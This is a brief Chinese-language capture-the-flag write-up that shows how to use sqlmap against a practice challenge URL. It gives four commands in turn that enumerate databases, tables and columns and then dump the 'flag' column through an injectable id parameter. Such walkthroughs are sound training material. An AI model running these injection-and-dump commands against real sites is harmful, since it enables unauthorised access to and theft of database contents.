1. 程式人生 > >SQL(sqlmap工具)

SQL(sqlmap工具)

輸入1,頁面顯示hello,輸入1',頁面報錯

1.報資料庫   --dbs

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs

2.猜表段    --tables (需指定資料庫  -D 資料庫名)

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables -D web1

3.猜欄位   --columns  (需制定表段  -T    制定資料庫  -D)

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --columns -T flag -D web1


4.猜欄位內容  --dump   (需指定欄位  -C  制定表段  -T  制定資料庫  -D)

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dump -C flag -T flag -D web1